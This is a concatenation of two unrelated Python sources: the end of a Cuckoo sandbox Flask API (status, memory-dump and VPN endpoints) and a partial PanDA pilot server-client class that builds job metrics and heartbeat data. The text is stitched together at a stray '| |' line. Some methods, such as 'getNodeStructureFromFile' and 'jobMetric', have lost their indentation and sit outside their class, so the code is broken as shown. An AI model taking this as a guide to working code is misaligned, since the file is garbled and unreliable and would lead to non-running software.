            memory = 100.0 * int(values["MemAvailable"]) / int(values["MemTotal"])
        else:
            memory = None
    else:
        memory = None
    response = dict(
        version=CUCKOO_VERSION,
        hostname=socket.gethostname(),
        machines=dict(
            total=len(db.list_machines()),
            available=db.count_machines_available()
        ),
        tasks=dict(
            total=db.count_tasks(),
            pending=db.count_tasks("pending"),
            running=db.count_tasks("running"),
            completed=db.count_tasks("completed"),
            reported=db.count_tasks("reported")
        ),
        diskspace=diskspace,
        cpuload=cpuload,
        memory=memory,
    )
    return jsonify(response)
@app.route("/memory/list/<int:task_id>")
def memorydumps_list(task_id):
    """List the process memory dumps recorded for a task."""
    folder_path = os.path.join(CUCKOO_ROOT, "storage", "analyses", str(task_id), "memory")
    if not os.path.exists(folder_path):
        return json_error(404, "Memory dump not found")
    memory_files = []
    for _, _, files in os.walk(folder_path):
        for filename in files:
            memory_files.append(filename.replace(".dmp", ""))
    if not memory_files:
        return json_error(404, "Memory dump not found")
    return jsonify({"dump_files": memory_files})
@app.route("/memory/get/<int:task_id>/<pid>")
def memorydumps_get(task_id, pid=None):
    """Return the raw memory dump of one process of a task."""
    folder_path = os.path.join(CUCKOO_ROOT, "storage", "analyses", str(task_id), "memory")
    if not os.path.exists(folder_path) or not pid:
        return json_error(404, "Memory dump not found")
    pid_path = os.path.join(folder_path, "{0}.dmp".format(pid))
    if not os.path.exists(pid_path):
        return json_error(404, "Memory dump not found")
    # FIX: close the (potentially large) dump file instead of leaking the
    # handle as the original open(...).read() did.
    with open(pid_path, "rb") as f:
        response = make_response(f.read())
    response.headers["Content-Type"] = \
        "application/octet-stream; charset=UTF-8"
    return response
@app.route("/vpn/status")
def vpn_status():
    """Report the status of the configured VPNs via the rooter."""
    vpns = rooter("vpn_status")
    if vpns is None:
        return json_error(500, "Rooter not available")
    return jsonify({"vpns": vpns})
if __name__ == "__main__":
    # Command-line entry point: parse bind options, optionally drop root
    # privileges, then serve the API with Flask's built-in server.
    parser = argparse.ArgumentParser()
    parser.add_argument("-H", "--host", help="Host to bind the API server on",
                        default="localhost", action="store", required=False)
    parser.add_argument("-p", "--port", help="Port to bind the API server on",
                        default=8090, action="store", required=False)
    parser.add_argument("-u", "--user", type=str,
                        help="Drop user privileges to this user")
    args = parser.parse_args()
    if args.user:
        # Must happen before binding the socket when started as root.
        drop_privileges(args.user)
    app.run(host=args.host, port=int(args.port))
| |
import os
import traceback
from time import time, gmtime, strftime
from datetime import date
from commands import getstatusoutput, getoutput
from shutil import copy2
from PilotErrors import PilotErrors
from pUtil import tolog, readpar, timeStamp, getBatchSystemJobID, getCPUmodel, PFCxml, updateMetadata, addSkippedToPFC,\
makeHTTPUpdate, tailPilotErrorDiag, isLogfileCopied, updateJobState, updateXMLWithSURLs, getMetadata, toPandaLogger,\
getSiteInformation, getExperiment, readStringFromFile, merge_dictionaries, updateXMLWithEndpoints, isAnalysisJob
from JobState import JobState
from FileStateClient import getFilesOfState
from FileHandling import getOSTransferDictionaryFilename, getOSTransferDictionary, getHighestPriorityError
class PandaServerClient:
    """
    Client to the Panda Server
    Methods for communicating with the Panda Server
    """
    # private data members (class-level defaults; overwritten per-instance
    # in __init__)
    __errorString = "!!WARNING!!1992!! %s" # default error string
    __error = PilotErrors() # PilotErrors object
    __pilot_version_tag = "" # pilot version tag string
    __pilot_initdir = "" # directory the pilot was started from
    __jobSchedulerId = "" # job scheduler identifier
    __pilotId = "" # pilot identifier
    __updateServer = True # whether server updates should actually be sent
    __jobrec = False # whether job recovery mode is enabled
    __pshttpurl = "" # Panda server HTTP(S) base URL
    def __init__(self, pilot_version="", pilot_version_tag="", pilot_initdir="", jobSchedulerId=None, pilotId=None, updateServer=True, jobrec=False, pshttpurl=""):
        """ Default initialization """
        # Copy the caller-supplied settings onto the private members
        # declared at class level.
        self.__pilot_version_tag = pilot_version_tag
        self.__pilot_initdir = pilot_initdir
        self.__jobSchedulerId = jobSchedulerId
        self.__pilotId = pilotId
        self.__updateServer = updateServer
        self.__jobrec = jobrec
        self.__pshttpurl = pshttpurl
        self.__pilot_version = pilot_version
def getNodeStructureFromFile(self, workDir, jobId):
""" get the node structure from the Job State file """
JS = JobState()
_node = None
# open the job state file
tolog("workDir: %s" % (workDir))
tolog("jobId: %s" % (jobId))
filename = JS.getFilename(workDir, jobId)
tolog("filename: %s" % (filename))
if os.path.exists(filename):
# load the objects
if JS.get(filename):
# decode the job state info
_job, _site, _node, _recoveryAttempt = JS.decode()
else:
tolog("JS.decode() failed to load objects")
else:
tolog("%s does not exist" % (filename))
return _node
    def copyNodeStruct4NG(self, node):
        """ store the node structure for ARC """
        # Pickle the node structure to the current working directory and
        # then copy it to the pilot init dir; every failure is logged as a
        # warning and swallowed (best-effort behavior, Python 2 syntax).
        from pickle import dump
        try:
            _fname = "%s/panda_node_struct.pickle" % os.getcwd()
            fp = open(_fname, "w")
        except Exception, e:
            tolog("!!WARNING!!2999!! Could not store panda node structure: %s" % str(e))
        else:
            try:
                dump(node, fp)
                fp.close()
            except Exception, e:
                tolog("!!WARNING!!2999!! Could not dump panda node structure: %s" % str(e))
            else:
                tolog("Stored panda node structure at: %s" % (_fname))
                tolog("node : %s" % (str(node)))
                try:
                    copy2(_fname, self.__pilot_initdir)
                except Exception, e:
                    tolog("!!WARNING!!2999!! Could not copy panda node structure to init dir: %s" % str(e))
                else:
                    tolog("Copied panda node structure (%s) to init dir: %s" % (_fname, self.__pilot_initdir))
def jobMetric(self, key="", value=""):
""" Add 'key'='value' to the jobMetrics """
# Use this method to avoid missing the separating space between key-value pairs in the job metrics
if key != "" and value != "":
# Add a space at the end since there might be several key values added
jobMetric = "%s=%s " % (key, value)
else:
jobMetric = ""
return jobMetric
def getJobMetrics(self, job, site, workerNode):
    """ Return a properly formatted job metrics string

    Assembles space-separated key=value pairs (core count, event counts,
    Yoda/HPC metrics, alternative stage-out info, object-store bucket id,
    DB access figures and worker-node features) for the server heartbeat.
    job.coreCount may be modified as a side effect (from ATHENA_PROC_NUMBER
    or set to 0 on HPC sites). The result is capped at the server's
    500-character field size.
    """
    # style: Number of events read | Number of events written | vmPeak maximum | vmPeak average | RSS average | JEM activation
    # format: nEvents=<int> nEventsW=<int> vmPeakMax=<int> vmPeakMean=<int> RSSMean=<int> JEM=<string>
    # hs06=<float> shutdownTime=<int> cpuFactor=<float> cpuLimit=<float> diskLimit=<float> jobStart=<int> memLimit=<int> runLimit=<float>
    # get the experiment object
    # NOTE(review): thisExperiment is not used below - possibly vestigial; confirm before removing
    thisExperiment = getExperiment(job.experiment)
    # on HPC sites a missing core count is normalized to 0; elsewhere the
    # ATHENA_PROC_NUMBER environment variable takes precedence when set
    if "HPC_HPC" in readpar('catchall'):
        if job.coreCount is None:
            job.coreCount = 0
    else:
        if job.coreCount:
            # Always use the ATHENA_PROC_NUMBER first, if set
            if os.environ.has_key('ATHENA_PROC_NUMBER'):
                try:
                    job.coreCount = int(os.environ['ATHENA_PROC_NUMBER'])
                except Exception, e:
                    tolog("ATHENA_PROC_NUMBER is not properly set: %s (will use existing job.coreCount value)" % (e))
        else:
            try:
                job.coreCount = int(os.environ['ATHENA_PROC_NUMBER'])
            except:
                tolog("env ATHENA_PROC_NUMBER is not set. corecount is not set")
    coreCount = job.coreCount
    jobMetrics = ""
    # each self.jobMetric() call returns 'key=value ' with a trailing separator
    if coreCount is not None and coreCount != "NULL" and coreCount != 'null':
        jobMetrics += self.jobMetric(key="coreCount", value=coreCount)
    if job.nEvents > 0:
        jobMetrics += self.jobMetric(key="nEvents", value=job.nEvents)
    if job.nEventsW > 0:
        jobMetrics += self.jobMetric(key="nEventsW", value=job.nEventsW)
    if job.external_stageout_time:
        jobMetrics += self.jobMetric(key="ExStageoutTime", value=job.external_stageout_time)
    # hpc status
    #if job.mode:
    #    jobMetrics += self.jobMetric(key="mode", value=job.mode)
    #if job.hpcStatus:
    #    jobMetrics += self.jobMetric(key="HPCStatus", value=job.hpcStatus)
    if job.yodaJobMetrics:
        for key in job.yodaJobMetrics:
            if key == 'startTime' or key == 'endTime':
                # epoch seconds are converted to a UTC timestamp string
                value = strftime("%Y-%m-%d %H:%M:%S", gmtime(job.yodaJobMetrics[key]))
                jobMetrics += self.jobMetric(key=key, value=value)
            elif key.startswith("min") or key.startswith("max"):
                # min*/max* entries are deliberately not forwarded
                pass
            else:
                jobMetrics += self.jobMetric(key=key, value=job.yodaJobMetrics[key])
    #if job.HPCJobId:
    #    jobMetrics += self.jobMetric(key="HPCJobId", value=job.HPCJobId)
    # eventservice zip file
    if job.outputZipName and job.outputZipBucketID:
        jobMetrics += self.jobMetric(key="outputZipName", value=os.path.basename(job.outputZipName))
        jobMetrics += self.jobMetric(key="outputZipBucketID", value=job.outputZipBucketID)
    # report alternative stage-out in case alt SE method was used
    # (but not in job recovery mode)
    # NOTE(review): recovery_mode is hard-coded False here, so the guard below is currently always active
    recovery_mode = False
    if job.filesAltStageOut > 0 and not recovery_mode:
        #_jobMetrics = ""
        #_jobMetrics += " filesAltStageOut=%d" % (job.filesAltStageOut)
        #_jobMetrics += " filesNormalStageOut=%d" % (job.filesNormalStageOut)
        #tolog("Could have reported: %s" % (_jobMetrics))
        # Report which output files were moved to an alternative SE
        filenames = getFilesOfState(site.workdir, job.jobId, state="alt_transferred")
        if filenames != "":
            jobMetrics += self.jobMetric(key="altTransferred", value=filenames)
    # report on which OS bucket the log was written to, if any (-1 means none)
    if job.logBucketID != -1:
        jobMetrics += self.jobMetric(key="logBucketID", value=job.logBucketID)
    # only add the JEM bit if explicitly set to YES, otherwise assumed to be NO
    if job.JEM == "YES":
        jobMetrics += self.jobMetric(key="JEM", value=1)
        # old format: jobMetrics += " JEM=%s" % (job.JEM)
    if job.dbTime != "":
        jobMetrics += self.jobMetric(key="dbTime", value=job.dbTime)
    if job.dbData != "":
        jobMetrics += self.jobMetric(key="dbData", value=job.dbData)
    # machine and job features, max disk space used by the payload
    jobMetrics += workerNode.addToJobMetrics(job.result[0], self.__pilot_initdir, job.jobId)
    # NOTE(review): si and _jobMetrics are unused since the OS-transfer
    # reporting below was commented out - candidates for removal
    si = getSiteInformation(job.experiment)
    _jobMetrics = ""
    # report any OS transfers
    #message = self.getOSJobMetrics()
    #if message != "":
    #    _jobMetrics = self.jobMetric(key="OS", value=message)
    #    tolog("Could have added: %s to job metrics" % (_jobMetrics))
    # correct for potential initial and trailing space
    jobMetrics = jobMetrics.lstrip().rstrip()
    if jobMetrics != "":
        tolog('Job metrics=\"%s\"' % (jobMetrics))
    else:
        tolog("No job metrics (all values are zero)")
    # is jobMetrics within allowed size?
    if len(jobMetrics) > 500:
        tolog("!!WARNING!!2223!! jobMetrics out of size (%d)" % (len(jobMetrics)))
        # try to reduce the field size and remove the last entry which might be cut
        jobMetrics = jobMetrics[:500]
        jobMetrics = " ".join(jobMetrics.split(" ")[:-1])
        tolog("jobMetrics has been reduced to: %s" % (jobMetrics))
    return jobMetrics
# deprecated
def getOSJobMetrics(self):
    """ Generate the objectstore jobMetrics message

    Reads the OS transfer dictionary from the pilot init dir and builds a
    '<os_name>;<bucket>:<bucket>:..' summary of which object-store buckets
    were written to. Only the first os_name is reported; returns '' when
    no transfers were recorded.
    """
    # Message format:
    # OS=<os_name_0>:<os_bucket_endpoint_0>:<os_bucket_endpoint_1>: ..
    # Example:
    # os_name = BNL_OS_0, os_bucket_name = atlas_eventservice_F0 or atlas_logs_3D (where F0 and 3D are examples of file name hashes)
    # -> OS=BNL_OS_0;atlas_eventservice_F0:atlas_logs_3D
    # (note: at least one os_bucket_endpoint will be included in a message, but not necessarily both of them and order is random)
    message = ""
    # Locate the OS transfer dictionary
    filename = getOSTransferDictionaryFilename()
    path = os.path.join(self.__pilot_initdir, filename)
    if os.path.exists(path):
        # Which OS's were used?
        os_names_dictionary = getOSTransferDictionary(path)
        if os_names_dictionary != {}:
            message = ""
            os_names = os_names_dictionary.keys()
            # Note: there should only be one os_name
            if len(os_names) > 1:
                tolog("!!WARNING!!2345!! Can only report one ddm endpoint (will use first only): %s" % (os_names_dictionary))
            # Which buckets were written to?
            for os_name in os_names_dictionary.keys():
                message += os_name + ";"
                bucket_list = os_names_dictionary[os_name]
                for os_bucket_endpoint in bucket_list:
                    message += os_bucket_endpoint + ":"
                # Remove the last ':'
                message = message[:-1]
                # Ignore any other os_names - there should only be one and we can only report one
                break
        else:
            tolog("!!WARNING!!3335!! No OS transfers were found in: %s" % (filename))
    else:
        tolog("OS transfer dictionary does not exist, will not report OS transfers in jobMetrics (%s)" % (path))
    return message
def getNodeStructure(self, job, site, workerNode, spaceReport=False, log=None):
    """ define the node structure expected by the server

    Builds the heartbeat dictionary: identity (node/site/job ids), pilot
    and batch-system ids, timestamps, jobMetrics, error codes/diagnostics,
    CPU consumption and optional log extracts. May modify job.result[2],
    job.pilotErrorDiag and job.exeErrorCode as a side effect when high
    priority errors are found or codes are reconciled.

    :param spaceReport: accepted for interface compatibility (not used here)
    :param log: log extracts, attached for failed/holding jobs
    :return: node dictionary
    """
    node = {}
    node['node'] = workerNode.nodename
    node['workdir'] = job.workdir
    node['siteName'] = site.sitename
    node['jobId'] = job.jobId
    node['state'] = job.result[0]
    node['timestamp'] = timeStamp()
    if job.attemptNr > -1:
        node['attemptNr'] = job.attemptNr
    if self.__jobSchedulerId:
        node['schedulerID'] = self.__jobSchedulerId
    if self.__pilotId:
        use_newmover = str(readpar('use_newmover')).lower() in ["1", "true"]
        use_newmover_tag = 'NEWMOVER-%s' % ('ON' if use_newmover else 'OFF')
        tolog("Checking if new site movers workflow is enabled: use_newmover=%s" % use_newmover)
        # report the batch system job id, if available
        batchSystemType, _id = getBatchSystemJobID()
        if batchSystemType:
            tolog("Batch system: %s" % batchSystemType)
            tolog("Batch system job ID: %s" % _id)
            # pilotID is a '|'-separated composite: id|newmover tag|batch type|version tag|version
            node['pilotID'] = "%s|%s|%s|%s|%s" % (self.__pilotId, use_newmover_tag, batchSystemType, self.__pilot_version_tag, self.__pilot_version)
            node['batchID'] = _id
            tolog("Will send batchID: %s and pilotID: %s" % (node['batchID'], node['pilotID']))
        else:
            tolog("Batch system type was not identified (will not be reported)")
            # same composite without the batch system type
            node['pilotID'] = "%s|%s|%s|%s" % (self.__pilotId, use_newmover_tag, self.__pilot_version_tag, self.__pilot_version)
            tolog("Will send pilotID: %s" % node['pilotID'])
        tolog("pilotId: %s" % str(self.__pilotId))
    # attach log extracts for failed/holding jobs, or when outbound
    # connection info must reach the server
    if log and (job.result[0] == 'failed' or job.result[0] == 'holding' or "outbound connections" in log):
        node['pilotLog'] = log
    # add the startTime if the file exists
    _filename = 'START_TIME_%s' % (job.jobId)
    _path = os.path.join(self.__pilot_initdir, _filename)
    if os.path.exists(_path):
        startTime = readStringFromFile(_path)
        node['startTime'] = startTime
    # Yoda (event service) metrics override the file-based start/end times
    if job.yodaJobMetrics:
        if 'startTime' in job.yodaJobMetrics and job.yodaJobMetrics['startTime']:
            node['startTime'] = strftime("%Y-%m-%d %H:%M:%S", gmtime(job.yodaJobMetrics['startTime']))
            #job.yodaJobMetrics['startTime'] = node['startTime']
        if 'endTime' in job.yodaJobMetrics and job.yodaJobMetrics['endTime']:
            node['endTime'] = strftime("%Y-%m-%d %H:%M:%S", gmtime(job.yodaJobMetrics['endTime']))
            #job.yodaJobMetrics['endTime'] = node['endTime']
    # build the jobMetrics
    node['jobMetrics'] = self.getJobMetrics(job, site, workerNode)
    # for hpc status; note that job.subStatus, when set, takes precedence
    if job.hpcStatus:
        node['jobSubStatus'] = job.hpcStatus
    tolog("jobSubStatus: %s" % job.subStatus)
    if job.subStatus:
        node['jobSubStatus'] = job.subStatus
    if job.coreCount and job.coreCount != 'null' and job.coreCount != 'NULL':
        node['coreCount'] = job.coreCount
    if job.HPCJobId:
        node['batchID'] = job.HPCJobId
    # check to see if there were any high priority errors reported
    errorInfo = getHighestPriorityError(job.jobId, self.__pilot_initdir)
    if errorInfo != {}:
        try:
            pilotErrorCode = errorInfo['pilotErrorCode']
            pilotErrorDiag = errorInfo['pilotErrorDiag']
        except Exception, e:
            tolog("!!WARNING!!2323!! Exception caught: %s" % (e))
        else:
            # Overwrite any existing errors
            # a reported code of 0 must not wipe out a real error already in job.result[2]
            if pilotErrorCode == 0 and job.result[2] != 0:
                tolog('Encountered bad high priority error code %d (will not overwrite error code %d)' % (pilotErrorCode, job.result[2]))
            else:
                if job.result[2] != 0:
                    tolog("Encountered high priority error code %d (will overwrite error code %d)" % (pilotErrorCode, job.result[2]))
                else:
                    tolog("Encountered high priority error code %d" % (pilotErrorCode))
                job.result[2] = pilotErrorCode
                job.pilotErrorDiag = pilotErrorDiag
    else:
        tolog("Did not find any reported high priority errors")
    # send pilotErrorDiag for finished, failed and holding jobs
    if job.result[0] == 'finished' or job.result[0] == 'failed' or job.result[0] == 'holding':
        # get the pilot error diag from the right source
        if job.pilotErrorDiag:
            if job.pilotErrorDiag == "":
                node['pilotErrorDiag'] = tailPilotErrorDiag(self.__error.getPilotErrorDiag(job.result[2]))
                job.pilotErrorDiag = node['pilotErrorDiag']
                tolog("Empty pilotErrorDiag set to: %s" % (job.pilotErrorDiag))
            elif job.pilotErrorDiag.upper().find("<HTML>") >= 0:
                # replace raw html error pages with the standard diagnostic text
                tolog("Found html in pilotErrorDiag: %s" % (job.pilotErrorDiag))
                node['pilotErrorDiag'] = self.__error.getPilotErrorDiag(job.result[2])
                job.pilotErrorDiag = node['pilotErrorDiag']
                tolog("Updated pilotErrorDiag: %s" % (job.pilotErrorDiag))
            else:
                # truncate if necesary
                if len(job.pilotErrorDiag) > 250:
                    tolog("pilotErrorDiag will be truncated to size 250")
                    tolog("Original pilotErrorDiag message: %s" % (job.pilotErrorDiag))
                    job.pilotErrorDiag = job.pilotErrorDiag[:250]
                # set the pilotErrorDiag, but only the last 256 characters
                node['pilotErrorDiag'] = tailPilotErrorDiag(job.pilotErrorDiag)
        else:
            # set the pilotErrorDiag, but only the last 256 characters
            job.pilotErrorDiag = self.__error.getPilotErrorDiag(job.result[2])
            node['pilotErrorDiag'] = tailPilotErrorDiag(job.pilotErrorDiag)
            tolog("Updated pilotErrorDiag from None: %s" % (job.pilotErrorDiag))
        # get the number of events, should report in heartbeat in case of preempted.
        if job.nEvents != 0:
            node['nEvents'] = job.nEvents
            tolog("Total number of processed events: %d (read)" % (job.nEvents))
        else:
            tolog("Payload/TRF did not report the number of read events")
        try:
            # report CPUTime and CPUunit at the end of the job
            try:
                constime = int(job.cpuConsumptionTime)
            except:
                constime = None
            if constime:
                # 10**9 seconds (~30 years) is used as a sanity bound on the reported value
                if constime < 10**9:
                    node['cpuConsumptionTime'] = job.cpuConsumptionTime
                else:
                    tolog("!!WARNING!!2222!! Unrealistic cpuConsumptionTime: %s (reset to -1)" % job.cpuConsumptionTime)
                    node['cpuConsumptionTime'] = "-1"
        except:
            tolog("Failed to get cpu time: %s" % traceback.format_exc())
        try:
            node['cpuConsumptionUnit'] = job.cpuConsumptionUnit + "+" + getCPUmodel()
        except:
            node['cpuConsumptionUnit'] = '?'
        node['cpuConversionFactor'] = job.cpuConversionFactor
        if job.result[0] == 'finished' or job.result[0] == 'failed':
            # make sure there is no mismatch between the transformation error codes (when both are reported)
            # send transformation errors depending on what is available
            if job.exeErrorDiag != "":
                node['exeErrorCode'] = job.exeErrorCode
                node['exeErrorDiag'] = job.exeErrorDiag
                # verify that exeErrorCode is set, if not, use the info in result[1]
                if job.exeErrorCode == 0:
                    tolog("WARNING: job.exeErrorDiag is set but not job.exeErrorCode: setting it to: %d" % (job.result[1]))
                    job.exeErrorCode = job.result[1]
                    node['exeErrorCode'] = job.exeErrorCode
            else:
                node['transExitCode'] = job.result[1]
            if (job.result[0] == 'failed') and (job.exeErrorCode != 0) and (job.result[1] != job.exeErrorCode):
                if log:
                    # prepend the mismatch note to the log extracts sent to the server
                    mismatch = "MISMATCH | Trf error code mismatch: exeErrorCode = %d, transExitCode = %d" %\
                               (job.exeErrorCode, job.result[1])
                    if node.has_key('pilotLog'):
                        node['pilotLog'] = mismatch + node['pilotLog']
                    else:
                        tolog("!!WARNING!!1300!! Could not write mismatch error to log extracts: %s" % mismatch)
            # check if Pilot-controlled resubmission is required:
            analyJob = isAnalysisJob(job.trf.split(",")[0])
            if (job.result[0] == "failed" and analyJob):
                pilotExitCode = job.result[2]
                error = PilotErrors()
                if (error.isPilotResubmissionErrorCode(pilotExitCode) or job.isPilotResubmissionRequired):
                    # negate PilotError, ensure it's negative
                    # (a negative code signals the server to resubmit)
                    job.result[2] = -abs(pilotExitCode)
                    tolog("(Negated error code)")
                else:
                    tolog("(No need to negate error code)")
            node['pilotErrorCode'] = job.result[2]
            tolog("Pilot error code: %d" % (node['pilotErrorCode']))
            # report specific time measures
            # field order is getJob|stageIn|exe|stageOut|setup
            # node['pilotTiming'] = "getJob=%s setup=%s stageIn=%s payload=%s stageOut=%s" % (job.timeGetJob, job.timeSetup, job.timeStageIn, job.timeExe, job.timeStageOut)
            node['pilotTiming'] = "%s|%s|%s|%s|%s" % (job.timeGetJob, job.timeStageIn, job.timeExe, job.timeStageOut, job.timeSetup)
        elif job.result[0] == 'holding':
            node['exeErrorCode'] = job.result[2]
            node['exeErrorDiag'] = self.__error.getPilotErrorDiag(job.result[2])
    else:
        # job still running: only the CPU model is reported
        node['cpuConsumptionUnit'] = getCPUmodel()
    # Add the utility info if it is available
    thisExperiment = getExperiment(job.experiment)
    if thisExperiment.shouldExecuteUtility():
        utility_node = thisExperiment.getUtilityInfo(job.workdir, self.__pilot_initdir, allowTxtFile=True)
        node = merge_dictionaries(node, utility_node)
    return node
def getXML(self, job, sitename, workdir, xmlstr=None, jr=False):
    """ Get the metadata xml

    For failed jobs (whose log was transferred) a log-only metadata file
    is generated on the fly; for other final states the xmlstr prepared
    in postJobTask is used. Returns '' when no xml should be sent.
    Side effect: removes the local log file for finished/failed non-NG jobs.

    :param xmlstr: metadata xml prepared earlier (all output files)
    :param jr: True when called from job recovery
    """
    node_xml = ""
    tolog("getXML called")
    # for backwards compatibility
    try:
        experiment = job.experiment
    except:
        experiment = "unknown"
    # do not send xml for state 'holding' (will be sent by a later pilot during job recovery)
    if job.result[0] == 'holding' and sitename != "CERNVM":
        pass
    else:
        # only create and send log xml if the log was transferred
        if job.result[0] == 'failed' and isLogfileCopied(workdir, job.jobId):
            # generate the xml string for log file
            # at this time the job.workdir might have been removed (because this function can be called
            # after the removal of workdir is done), so we make a new dir
            xmldir = "%s/XML4PandaJob_%s" % (workdir, job.jobId)
            # group rw permission added as requested by LYON
            ec, rv = getstatusoutput("mkdir -m g+rw %s" % (xmldir))
            if ec != 0:
                tolog("!!WARNING!!1300!! Could not create xmldir from updatePandaServer: %d, %s (resetting to site workdir)" % (ec, rv))
                cmd = "ls -l %s" % (xmldir)
                out = getoutput(cmd)
                tolog("%s \n%s" % (cmd, out))
                xmldir = workdir
            # on Nordugrid the log lives in the pilot init dir
            if os.environ.has_key('Nordugrid_pilot'):
                fname = os.path.join(self.__pilot_initdir, job.logFile)
            else:
                fname = os.path.join(workdir, job.logFile)
            if os.path.exists(fname):
                fnamelog = "%s/logfile.xml" % (xmldir)
                # create a PFC-style xml containing only the log file entry
                guids_status = PFCxml(experiment, fnamelog, fntag="lfn", alog=job.logFile, alogguid=job.tarFileGuid, jr=jr, logToOS=job.putLogToOS)
                from SiteMover import SiteMover
                ec, pilotErrorDiag, _fsize, _checksum = SiteMover.getLocalFileInfo(fname, csumtype="adler32")
                if ec != 0:
                    tolog("!!WARNING!!1300!! getLocalFileInfo failed: (%d, %s, %s)" % (ec, str(_fsize), str(_checksum)))
                    tolog("!!WARNING!!1300!! Can not set XML (will not be sent to server)")
                    node_xml = ''
                else:
                    ec, _strXML = updateMetadata(fnamelog, _fsize, _checksum)
                    if ec == 0:
                        tolog("Added (%s, %s) to metadata file (%s)" % (_fsize, _checksum, fnamelog))
                    else:
                        tolog("!!WARNING!!1300!! Could not add (%s, %s) to metadata file (%s). XML will be incomplete: %d" %\
                              (_fsize, _checksum, fnamelog, ec))
                    # add skipped file info
                    _skippedfname = os.path.join(workdir, "skipped.xml")
                    if os.path.exists(_skippedfname):
                        ec = addSkippedToPFC(fnamelog, _skippedfname)
                    # read the generated log metadata back into node_xml
                    try:
                        f = open(fnamelog)
                    except Exception,e:
                        tolog("!!WARNING!!1300!! Exception caught: Can not open the file %s: %s (will not send XML)" %\
                              (fnamelog, str(e)))
                        node_xml = ''
                    else:
                        node_xml = ''
                        for line in f:
                            node_xml += line
                        f.close()
                    # transfer logfile.xml to pilot init dir for Nordugrid
                    if os.environ.has_key('Nordugrid_pilot'):
                        try:
                            copy2(fnamelog, self.__pilot_initdir)
                        except Exception, e:
                            tolog("!!WARNING!!1600!! Exception caught: Could not copy NG log metadata file to init dir: %s" % str(e))
                        else:
                            tolog("Successfully copied NG log metadata file to pilot init dir: %s" % (self.__pilot_initdir))
            else: # log file does not exist anymore
                if isLogfileCopied(workdir, job.jobId):
                    tolog("Log file has already been copied and removed")
                    if not os.environ.has_key('Nordugrid_pilot'):
                        # only send xml with log info if the log has been transferred
                        if xmlstr:
                            node_xml = xmlstr
                            tolog("Found xml anyway (stored since before)")
                        else:
                            node_xml = ''
                            tolog("!!WARNING!!1300!! XML not found, nothing to send to server")
                else:
                    tolog("!!WARNING!!1300!! File %s does not exist and transfer lockfile not found (job from old pilot?)" % (fname))
                    node_xml = ''
        elif xmlstr:
            # xmlstr was set in postJobTask for all files
            tolog("XML string set")
            _skippedfname = os.path.join(workdir, "skipped.xml")
            fname = "%s/metadata-%s.xml" % (workdir, job.jobId)
            if os.path.exists(fname):
                if os.path.exists(_skippedfname):
                    # add the skipped file info if needed
                    ec = addSkippedToPFC(fname, _skippedfname)
                # transfer metadata to pilot init dir for Nordugrid
                if os.environ.has_key('Nordugrid_pilot'):
                    try:
                        copy2(fname, self.__pilot_initdir)
                    except Exception, e:
                        tolog("!!WARNING!!1600!! Exception caught: Could not copy metadata file to init dir for NG: %s" % str(e))
                    else:
                        tolog("Successfully copied metadata file to pilot init dir for NG: %s" % (self.__pilot_initdir))
            else:
                tolog("Warning: Metadata does not exist: %s" % (fname))
            tolog("Will send XML")
            node_xml = xmlstr
    # we don't need the job's log file anymore, delete it (except for NG)
    if (job.result[0] == 'failed' or job.result[0] == 'finished') and not os.environ.has_key('Nordugrid_pilot'):
        try:
            os.system("rm -rf %s/%s" % (workdir, job.logFile))
        except OSError:
            tolog("!!WARNING!!1300!! Could not remove %s" % (job.logFile))
        else:
            tolog("Removed log file")
    return node_xml
def updateOutputFilesXMLWithSURLs4NG(self, experiment, siteWorkdir, jobId, outputFilesXML):
    """ Update the OutputFiles.xml file with SURLs

    Reads the metadata file, injects the SURLs recorded in the special
    SURL dictionary, and writes it back in 'NG' format. Returns True on
    success, False on any read/write problem.
    """
    xml_path = os.path.join(siteWorkdir, outputFilesXML)
    if not os.path.exists(xml_path):
        tolog("!!WARNING!!1888!! Metadata file does not exist: %s" % (xml_path))
        return False
    # read back the current metadata
    try:
        f = open(xml_path, "r")
    except Exception as e:
        tolog("!!WARNING!!1990!! Could not open file %s: %s" % (xml_path, e))
        return False
    xmlIN = f.read()
    f.close()
    # inject the SURLs (Nordugrid format)
    xmlOUT = updateXMLWithSURLs(experiment, xmlIN, siteWorkdir, jobId, self.__jobrec, format='NG')
    # write the updated metadata back in place
    try:
        f = open(xml_path, "w")
    except OSError as e:
        tolog("!!WARNING!!1990!! Could not open file %s: %s" % (xml_path, e))
        return False
    f.write(xmlOUT)
    f.close()
    tolog("Final XML for Nordugrid / CERNVM:\n%s" % (xmlOUT))
    return True
def getDateDirs(self):
    """ Return a directory path based on the current date, e.g. '2014-09-22'

    (The value is dash-separated; an earlier comment incorrectly showed
    slashes.)
    """
    # snapshot the date once so year/month/day cannot disagree if the
    # calls happen to straddle a midnight rollover
    today = date.today()
    return "%s-%s-%s" % (today.strftime("%Y"), today.strftime("%m"), today.strftime("%d"))
def tryint(self, x):
    """ Best-effort integer conversion for version-string components.

    Non-numeric tokens are handed back unchanged, protecting the
    numbered string comparison against unexpected letters.
    """
    try:
        converted = int(x)
    except ValueError:
        return x
    return converted
def splittedname(self, s):
    """ Split *s* into a tuple of alternating text and integer runs.

    Used as a key for numbered string comparison/sorting:
    > names = ['YT4.11', '4.3', 'YT4.2', '4.10', 'PT2.19', 'PT2.9']
    > sorted(names, key=splittedname)
    ['4.3', '4.10', 'PT2.9', 'PT2.19', 'YT4.2', 'YT4.11']
    """
    from re import split
    # the capturing group keeps the digit runs in the split result
    pieces = split('([0-9]+)', s)
    return tuple(map(self.tryint, pieces))
def isAGreaterOrEqualToB(self, A, B):
    """ Natural-order comparison: is numbered string A >= B?

    > a="1.2.3"
    > b="2.2.2"
    > e.isAGreaterThanB(a,b)
    False
    """
    # tuple comparison is lexicographic over the split runs, so digit
    # sequences compare numerically rather than as text
    split_a = self.splittedname(A)
    split_b = self.splittedname(B)
    return split_a >= split_b
def getPayloadMetadataFilename(self, workdir, jobId, altloc=""):
    """ Return a proper path for the payload metadata

    Prefers the payload's jobReport.json (in workdir, or altloc as a
    fallback) when its reportVersion is at least 1.0.0; otherwise the
    legacy metadata-<jobId>.xml.PAYLOAD file is selected. If the chosen
    file is missing, the pilot init dir is checked as a last resort.

    :param workdir: primary directory to look in
    :param jobId: PanDA job id (used in the legacy metadata file name)
    :param altloc: optional alternative directory for jobReport.json
    :return: path to the metadata file (may not exist; a warning is logged)
    """
    filenamePayloadMetadata = ""
    # Primarily use the jobReport.json if its' version is >= 1.0.0
    _filename = os.path.join(workdir, "jobReport.json")
    if not os.path.exists(_filename) and altloc != "":
        _filename = os.path.join(altloc, "jobReport.json")
